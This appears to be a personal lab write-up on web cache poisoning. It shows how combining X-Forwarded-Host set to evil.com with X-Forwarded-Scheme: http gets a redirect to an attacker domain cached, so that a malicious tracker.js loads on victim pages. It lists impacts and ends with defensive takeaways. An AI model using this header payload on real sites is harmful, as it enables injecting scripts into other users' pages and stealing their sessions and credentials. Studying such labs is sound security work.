Note(Datetime, Name) : 2025-04-25 Web Cache Poisoning with multiple headers

Metodelogy

  1. Investigate the system to retrieve a list of features
  2. Discribe the feature and explain how it works
  3. List possible vulnerabilities and group by feature
  4. Proof of concept for possible vulnerabilities
  5. What is the impact of the vulnerabilities after the proof of concept ?

==========================================================================================================

feature:

  1. / -> got response -> indicated page is cache

HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Set-Cookie: session=aRRl8oPADEsf9eyGaK69gY43XSY30squ; Secure; HttpOnly; SameSite=None X-Frame-Options: SAMEORIGIN Cache-Control: max-age=30 Age: 0 X-Cache: miss Connection: close Content-Length: 10914

```

steps taken:

  1. X-Forwarded-Host: evil.com -> normal response
  2. X-Forwarded-Scheme: http -> server redirected to the https version of the website
  3. use this payload -> page is redirected to the evil.com and website is cached by server
X-Forwarded-Host: evil.com
X-Forwarded-Scheme: http

vulnerabilities :

  1. web cache poisioning by use header
X-Forwarded-Host: evil.com
X-Forwarded-Scheme: http

Proof of concept:

  1. send payload to / -> and got redirected to evil.com -> cached
X-Forwarded-Host: evil.com
X-Forwarded-Scheme: http
  1. Locate the file /resource/tracker.js and confirm that it is cacheable.
  2. Apply this payload and send a request to /resource/tracker.js. Make sure the tracker.js file is cached by the server:
X-Forwarded-Host: <yourdomain>
X-Forwarded-Scheme: http
  1. after the response is cached , any page that includes tracker.js will fetch it from /resource/tracker.js due to the redirect.

impact

1.An attacker can poison the cache and cause browsers to load a malicious tracker.js file.

2.This can lead to the execution of arbitrary JavaScript on victim pages, resulting in:

- Stolen credentials

- Session hijacking

- Full client-side takeover (depending on script capabilities)

takeaways

1.Always validate and sanitize any input headers, especially X-Forwarded-*.

2.Ensure cache keys include all relevant headers to prevent cache poisoning.

3.Avoid caching responses that include user-controllable input (even in headers).